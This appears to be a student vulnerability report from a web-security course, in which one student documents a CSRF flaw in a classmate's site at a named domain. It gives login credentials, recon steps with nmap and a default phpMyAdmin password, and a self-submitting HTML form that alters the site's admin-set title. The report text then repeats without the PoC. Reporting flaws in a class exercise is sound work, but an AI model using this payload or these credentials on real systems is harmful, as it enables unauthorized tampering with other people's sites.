Open M11115015 opened 2 years ago
攻擊者學號:B10704118 @B10704118
被攻擊者學號與網址:B10715030 @fisherrrr https://demo.fisherrrr.studio/
漏洞類型:CSRF(admin)
漏洞描述: 登入帳號:test 密碼:123(使用nmap找出sql的port,再用nslookup找ip,phpmyadmin密碼用老師上課預設的),登入後可進入管理頁面,經構建一個html該使用在登入狀態下點擊就會自動修改網頁標題成功 如圖:
Poc:
<form action="https://demo.fisherrrr.studio/adminPage-work.php" method="post" id="csrf-s"> <div>Index Title : <input type="text" name="title" value="csrf_hack_title"></div> <input type="hidden" name="type" value="title"> <a href="index.php">Back to index</a> <input type="submit" value="submit"> </form> <script>document.getElementById("csrf-s").submit();</script>
攻擊者學號:B10704118 @B10704118
被攻擊者學號與網址:B10715030 @fisherrrr https://demo.fisherrrr.studio/
漏洞類型:CSRF(admin)
漏洞描述: 登入帳號:test 密碼:123(使用nmap找出sql的port,再用nslookup找ip,phpmyadmin密碼用老師上課預設的),登入後可進入管理頁面,經構建一個html該使用在登入狀態下點擊就會自動修改網頁標題成功 如圖:
Poc: